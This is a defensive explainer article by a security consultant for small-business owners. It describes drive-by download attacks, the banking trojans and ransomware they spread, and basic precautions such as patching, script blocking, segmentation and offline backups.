What You Need to Know About 'Drive-By' Cyber Attacks

Last year’s epic Sony hack, which the FBI attributed to North Korea, was clearly a big wakeup call for businesses. But for most companies, unless you’re a Fortune 1000 or greater, your biggest threat doesn’t come from these highly sophisticated, targeted attacks. Instead, it’s lower level actors that pose the greatest danger - cyber-criminals whose goal is to steal or extort money out of businesses, and cause a lot of damage in the process.

One of the top attacks cyber-criminals now use against businesses is the “drive-by download.” Drive-by attacks aren’t entirely new, they’ve been around for a number of years, but recently they’ve accelerated dramatically and are now considered by many leading security companies, including Microsoft, Palo Alto Networks, Kaspersky and Barracuda Labs, to be a top method for criminals to spread malware online to unsuspecting users. These attacks are also becoming more advanced and harder to spot.

What makes the drive-by attack so dangerous is that it can happen to anyone through no fault of their own. Simply visiting a well-known, legitimate website can expose you to this attack. Even worse, drive-by downloads are now closely associated with two of the worst types of malware for small businesses: banking trojans and ransomware. These two particularly virulent strains of malware can cause enormous disruption to companies and may even put SMBs out of business.

Here’s what every SMB owner should know about this threat:

What is a drive-by download?

A drive-by download is a type of cyber attack that targets a person through their Internet browser, installing malware on their PC as soon as they visit an infected website. A person can be tricked into a drive-by download attack in two ways: (1) the person is lured into visiting a malicious website set up by criminals; or (2) the person visits a legitimate website that has unknowingly been compromised by hackers, and either infects the person directly (usually through an ad or pop-up) or redirects the person to a malicious site.

What type of malware can you get?

Drive-by attacks install a wide range of malicious files on the victim’s computer - it could be a virus, spyware, remote-access tool, keylogger, trojan and more. What is particularly concerning, however, is the drive-by’s propensity for infecting victim PCs with a banking trojan or ransomware.

  • Banking trojans allow the attacker to steal a company’s online banking credentials, which they use to hijack the account. They then perform fraudulent wire transfers to empty out the account. Financial losses stemming from banking trojan infections can be severe and are often not covered by banks. One example is a California escrow firm that declared bankruptcy in 2013 after cyber-criminals stole $1.5 million using banking trojans.
  • Ransomware is a type of virus or trojan that goes through the computer and locks up all of the files it can find (documents, spreadsheets, PDFs, videos, photos, etc.) behind an unbreakable wall of encryption. It can also block access to the computer itself. The only way to get rid of the ransomware in most cases is to overwrite the computer (which means losing everything on it) or to pay the ransom. However, even if you pay, there’s no guarantee the criminals will release your data or not attack you again.

What sites are most at risk?

Cyber-criminals prefer using well-established, high-traffic websites to conduct their attacks. According to a 2012 study by Barracuda Labs, over 50% of all sites serving drive-by downloads were more than five years old. The same study also found that 25,000 of the world’s most visited sites infected 10.5 million people with drive-by downloads in just one month.

Popular pornography and file-sharing sites often make the list for drive-by download risks, but a number of well-known, legitimate sites have also fallen victim, including: Huffington Post, Google, Microsoft, The New York Times, NBC, LA Weekly, Hasbro, Amnesty International, FHM, AskMen.com, Cracked.com, GameZone, etc.

How can companies protect themselves?

SMBs can reduce their exposure to drive-by attacks by taking several basic, inexpensive precautions:

  • First, make sure all employees are keeping their web browsers and key programs (Flash Player, Adobe Reader, Java, Microsoft Silverlight, etc.) updated with the latest security patches. Employees should also be running script-blocking plugins (like AdBlock Plus, ScriptSafe or NoScript) which block popups and malicious scripts. 
  • Try to “segment” the company’s computer network, so that everyone isn’t running on the same server. This will prevent an infection from spreading throughout the entire office. 
  • Don’t allow employees to have local administrative access to their computers; instead, set them up with a separate user account. 
  • Use ‘thin clients’ or Chromebooks if possible, as these don’t allow local storage on the computer, which reduces the risk of some types of infection. 
  • Run antivirus or malware detection programs on all machines. 
  • Back-up data as frequently as possible on external hard-drives which are not left connected to the network. 
  • Don’t login to a banking account from the same computer that is used to surf the web. Have a dedicated machine that does nothing but online banking. This is the best way to limit exposure to malware, like banking trojans.
  • Consider taking out a cyber insurance policy to cover losses and expenses resulting from these types of attacks. 

Jason Glassberg is co-founder of Casaba Security, a white hat hacking firm that performs hacking tests and security consulting for banks, retailers, government agencies and Fortune 500s.